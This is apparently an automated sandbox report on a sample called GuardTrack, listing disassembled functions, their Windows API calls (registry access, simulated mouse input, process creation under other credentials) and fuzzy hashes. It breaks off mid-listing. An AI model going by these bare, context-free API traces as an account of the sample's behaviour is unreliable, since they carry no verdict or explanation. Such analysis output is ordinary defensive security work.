LockResource.KERNEL32(00600817,?,?,00600817,?,?,00000000,00000000,?,?,?,?,?,?,005C4A14,00000000), ref: 00619F2F

Strings

SCRIPT, xrefs: 00619EF5

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: bca474ef6765e7ea7363aea2b0fbf5cc4fc215e027ede91f0b02cc20920b3190
Instruction ID: d78fe6d1ed20a6c664b05f59fcdc57803f64a58e8b0fd3a7f7ebf5d3358ea2b6
Opcode Fuzzy Hash: bca474ef6765e7ea7363aea2b0fbf5cc4fc215e027ede91f0b02cc20920b3190
Instruction Fuzzy Hash: CC115E74200700BFE7208B65DC48FA77BBAEBC9B11F148268BA09D6690DB71DC45C670

Function 005D9D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 005D9D16

Part of subcall function 005D33B7: EncodePointer.KERNEL32(00000000), ref: 005D33BA
Part of subcall function 005D33B7: __initp_misc_winsig.LIBCMT ref: 005D33D5
Part of subcall function 005D33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 005DA0D0
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 005DA0E4
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 005DA0F7
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 005DA10A
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 005DA11D
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 005DA130
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 005DA143
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 005DA156
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 005DA169
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 005DA17C
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 005DA18F
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 005DA1A2
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 005DA1B5
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 005DA1C8
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 005DA1DB
Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 005DA1EE

__mtinitlocks.LIBCMT ref: 005D9D1B
__mtterm.LIBCMT ref: 005D9D24

Part of subcall function 005D9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,005D9D29,005D7EFD,0066CD38,00000014), ref: 005D9E86
Part of subcall function 005D9D8C: _free.LIBCMT ref: 005D9E8D
Part of subcall function 005D9D8C: DeleteCriticalSection.KERNEL32(0Rg,?,?,005D9D29,005D7EFD,0066CD38,00000014), ref: 005D9EAF

__calloc_crt.LIBCMT ref: 005D9D49
__initptd.LIBCMT ref: 005D9D6B
GetCurrentThreadId.KERNEL32 ref: 005D9D72

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 492027422665db9b1ffa6f0bf0ef25af68274bf9a79c94b289480ad04ec4706e
Instruction ID: 378708609bc89d21dc36c256cb363e3a1f0cbf23c388ac0013815fd71ca6dea2
Opcode Fuzzy Hash: 492027422665db9b1ffa6f0bf0ef25af68274bf9a79c94b289480ad04ec4706e
Instruction Fuzzy Hash: 81F06D3251A7135AE7347B7CBC0B68A6E96FB81730F20071BF554D63D2EF10884181A1

Function 005D41B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,005D4282,?), ref: 005D41D3
GetProcAddress.KERNEL32(00000000), ref: 005D41DA
EncodePointer.KERNEL32(00000000), ref: 005D41E6
DecodePointer.KERNEL32(00000001,005D4282,?), ref: 005D4203

Strings

combase.dll, xrefs: 005D41CE
RoInitialize, xrefs: 005D41C2

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 0c923f104687f191542424febd6046a0e00779f295239e0efe82f0cea68826b2
Instruction ID: efc697d37403dc3e176915fd7371b028b26c924b334a2690ceb575a4bdc6ad2c
Opcode Fuzzy Hash: 0c923f104687f191542424febd6046a0e00779f295239e0efe82f0cea68826b2
Instruction Fuzzy Hash: 68E0E578A90721AFEB206FB4EC4DB083A67BB16B06FA06465B606D61A0CBF54184CF00

Function 005D428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,005D41A8), ref: 005D42A8
GetProcAddress.KERNEL32(00000000), ref: 005D42AF
EncodePointer.KERNEL32(00000000), ref: 005D42BA
DecodePointer.KERNEL32(005D41A8), ref: 005D42D5

Strings

combase.dll, xrefs: 005D42A3
RoUninitialize, xrefs: 005D4297

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: a96cf49650bf592c7beffef85e28bfd3235988b78e2ad752176b3a7d2b19c1e7
Instruction ID: eac53b87523e62184b055c8cf87f2a7eb8aeab43a6366e86895f11be23890a49
Opcode Fuzzy Hash: a96cf49650bf592c7beffef85e28bfd3235988b78e2ad752176b3a7d2b19c1e7
Instruction Fuzzy Hash: C0E0B678950B21ABEB259F60AD0DB453F67BB05B03F902566F206D6AE0CBF44684CE10

Function 005B218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 005B21B8
GetWindowRect.USER32(?,?), ref: 005B21F9
ScreenToClient.USER32(?,?), ref: 005B2221
GetClientRect.USER32(?,?), ref: 005B2350
GetWindowRect.USER32(?,?), ref: 005B2369

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 8ac6c7370ef632ac474f8f3d819734769b456d1067e6480c49f5dfd0ecd6eb8c
Instruction ID: 2609eba9b393c03c3441a34b09df916d70fe13386d4a5937f754d7e5328eb43f
Opcode Fuzzy Hash: 8ac6c7370ef632ac474f8f3d819734769b456d1067e6480c49f5dfd0ecd6eb8c
Instruction Fuzzy Hash: D0B1903990024ADBDF14CFA9C5807EEBBB1FF08310F149529ED99EB254DB34AA50CB65

Function 00616A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00616BC6
_memmove.LIBCMT ref: 00616B01

Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC

_memmove.LIBCMT ref: 00616B74
_memmove.LIBCMT ref: 00616C5B
_memmove.LIBCMT ref: 00616C74
_memmove.LIBCMT ref: 00616C90

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: d7c6c313eaf90a61c7f706f7d30033c8ef0e257baeb317b4a95423308137ce43
Instruction ID: da685421adadce37019087a056582a0a983c628d93ab4a8f99cd1c4ec6a24e34
Opcode Fuzzy Hash: d7c6c313eaf90a61c7f706f7d30033c8ef0e257baeb317b4a95423308137ce43
Instruction Fuzzy Hash: 4861D23450064AAFCF21EF64CC89EFE3BA9BF85308F08455AF85557292DB30AD45CB54

Function 00630844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

Part of subcall function 0063147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0063040D,?,?), ref: 00631491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0063091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0063095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00630980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006309A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 006309EC
RegCloseKey.ADVAPI32(00000000), ref: 006309F9

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: b6e4d129538cfd938cb49d424704e3d6bbfab64b632007717c5fc6901805bf87
Instruction ID: a8c7005bdc6ea0b2d5a522d72628fc6aaa7112ec659e6e0f4ef42a07db1aa185
Opcode Fuzzy Hash: b6e4d129538cfd938cb49d424704e3d6bbfab64b632007717c5fc6901805bf87
Instruction Fuzzy Hash: E0517C31108201AFE714EF64C899EAFBBEAFF85714F04491DF595872A2DB31E905CB92

Function 00635DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00635E38
GetMenuItemCount.USER32(00000000), ref: 00635E6F
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00635E97
GetMenuItemID.USER32(?,?), ref: 00635F06
GetSubMenu.USER32(?,?), ref: 00635F14
PostMessageW.USER32(?,00000111,?,00000000), ref: 00635F65

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: bbe133144dc144edf18b47039c4c0d177717108fc1dad0e6b1fdfc47912e77fd
Instruction ID: 05922817a79a5f27718bfc49e704d251eacec1dac9f092b106e4031d0ce2b4a8
Opcode Fuzzy Hash: bbe133144dc144edf18b47039c4c0d177717108fc1dad0e6b1fdfc47912e77fd
Instruction Fuzzy Hash: D8518D75A01626EFDB11EF64C845AEEBBB6EF48310F104059E912BB391CB34AE418FD1

Function 0060F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0060F6A2
VariantClear.OLEAUT32(00000013), ref: 0060F714
VariantClear.OLEAUT32(00000000), ref: 0060F76F
_memmove.LIBCMT ref: 0060F799
VariantClear.OLEAUT32(?), ref: 0060F7E6
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0060F814

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: a7911a77d35c677b613f4d60c9009f599967aa19cee8aae7d3afc17fffd4b1a2
Instruction ID: 863ec320f9488a17dd0cc90a8bcde722c04118aa69a5a2b94f9ac7ac4abd4181
Opcode Fuzzy Hash: a7911a77d35c677b613f4d60c9009f599967aa19cee8aae7d3afc17fffd4b1a2
Instruction Fuzzy Hash: 7F515E79A00209EFDB24CF58D884AAAB7F9FF4C314B15856AE959DB341E730E911CF90

Function 006129B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006129FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00612A4A
IsMenu.USER32(00000000), ref: 00612A6A
CreatePopupMenu.USER32 ref: 00612A9E
GetMenuItemCount.USER32(000000FF), ref: 00612AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00612B2D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 5a71fdc8ecc2f6781e1efacb466007f31c5794da3b556084ed21f6b64f7b27b4
Instruction ID: 6417183ab6cb0b546a64018fa944d3575b22d98128a1f6ac464a203d1c8299e1
Opcode Fuzzy Hash: 5a71fdc8ecc2f6781e1efacb466007f31c5794da3b556084ed21f6b64f7b27b4
Instruction Fuzzy Hash: 3051CE7060424BDFDF24CF68D898AEEBBF6EF05318F184119E8119B2A0D77099A5CB51

Function 005B1B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 005B1B76
GetWindowRect.USER32(?,?), ref: 005B1BDA
ScreenToClient.USER32(?,?), ref: 005B1BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005B1C08
EndPaint.USER32(?,?), ref: 005B1C52

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: c0dc28782bfcb90a609f0aa6796287395043d5a42b0b581110fde57f28d742cf
Instruction ID: b5decd72911a26c68cd147d08d0a18648605a4da09dc55e20830e8db3aad84f9
Opcode Fuzzy Hash: c0dc28782bfcb90a609f0aa6796287395043d5a42b0b581110fde57f28d742cf
Instruction Fuzzy Hash: 4841D230104701AFE711DF24CC98FA67FF9FB4A321F140568FA99872A2C730A844DB62

Function 0063BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(006777B0,00000000,00FF5C60,?,?,006777B0,?,0063BC1A,?,?), ref: 0063BD84
EnableWindow.USER32(?,00000000), ref: 0063BDA8
ShowWindow.USER32(006777B0,00000000,00FF5C60,?,?,006777B0,?,0063BC1A,?,?), ref: 0063BE08
ShowWindow.USER32(?,00000004,?,0063BC1A,?,?), ref: 0063BE1A
EnableWindow.USER32(?,00000001), ref: 0063BE3E
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0063BE61

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 762115a13a48199f37f3e018e924e43d7021e6d8fb0a1d1cd60815f8965d4acc
Instruction ID: 479743f00ed48823b49fe8c1bbf5654d4e5ad4a9ea18d8497d0cfbc2300dc4ba
Opcode Fuzzy Hash: 762115a13a48199f37f3e018e924e43d7021e6d8fb0a1d1cd60815f8965d4acc
Instruction Fuzzy Hash: AC416C35600154AFDB22CF28C489BD47BE2FF46314F1851A9EB498F3A2CB31A845CB91

Function 00627788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,0062550C,?,?,00000000,00000001), ref: 00627796

Part of subcall function 0062406C: GetWindowRect.USER32(?,?), ref: 0062407F

GetDesktopWindow.USER32 ref: 006277C0
GetWindowRect.USER32(00000000), ref: 006277C7
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 006277F9

Part of subcall function 006157FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00615877

GetCursorPos.USER32(?), ref: 00627825
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00627883

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: acfd064275dc6c2e56d7e91463701b68f407059921b3db80bc1ceaceec8f5587
Instruction ID: facf59c6e8cf24d19879057e33ccaa23041c34a67fcae62dea267074cbd06ca5
Opcode Fuzzy Hash: acfd064275dc6c2e56d7e91463701b68f407059921b3db80bc1ceaceec8f5587
Instruction Fuzzy Hash: 6931F272108325ABD720DF14D849F9BB7EAFF89314F000929F59597181CB34E948CF92

Function 00609431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00608CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00608CDE
Part of subcall function 00608CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00608CE8
Part of subcall function 00608CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00608CF7
Part of subcall function 00608CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00608CFE
Part of subcall function 00608CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00608D14

GetLengthSid.ADVAPI32(?,00000000,0060904D), ref: 00609482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0060948E
HeapAlloc.KERNEL32(00000000), ref: 00609495
CopySid.ADVAPI32(00000000,00000000,?), ref: 006094AE
GetProcessHeap.KERNEL32(00000000,00000000,0060904D), ref: 006094C2
HeapFree.KERNEL32(00000000), ref: 006094C9

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 05c87ee6e26792c187dc9e7c8a48c329f00dac8e2b14b0ea58b45d5a0d0d1526
Instruction ID: 62ad042014df990ddccd186c910d7981e9b977f59fa51d7b285023dc65dca56d
Opcode Fuzzy Hash: 05c87ee6e26792c187dc9e7c8a48c329f00dac8e2b14b0ea58b45d5a0d0d1526
Instruction Fuzzy Hash: 1811DC36540204FFEB189FA4CC09BEF7BBBEB42312F108058E98193251C7369902CB60

Function 006091CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00609200
OpenProcessToken.ADVAPI32(00000000), ref: 00609207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00609216
CloseHandle.KERNEL32(00000004), ref: 00609221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00609250
DestroyEnvironmentBlock.USERENV(00000000), ref: 00609264

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 275b71f71937693b3c0660f6e1ed595669598cb00022685ea0a7f8956247e61e
Instruction ID: 3d4d15d247e77ccaba001ac2aa5ff16648a84f4234e27b146e15d97249f076fb
Opcode Fuzzy Hash: 275b71f71937693b3c0660f6e1ed595669598cb00022685ea0a7f8956247e61e
Instruction Fuzzy Hash: 5B11597654120EBBEF118F94ED49FDE7BAAEF09704F044054FE04A21A1C3769E61EB61

Function 0060C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0060C34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 0060C35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0060C366
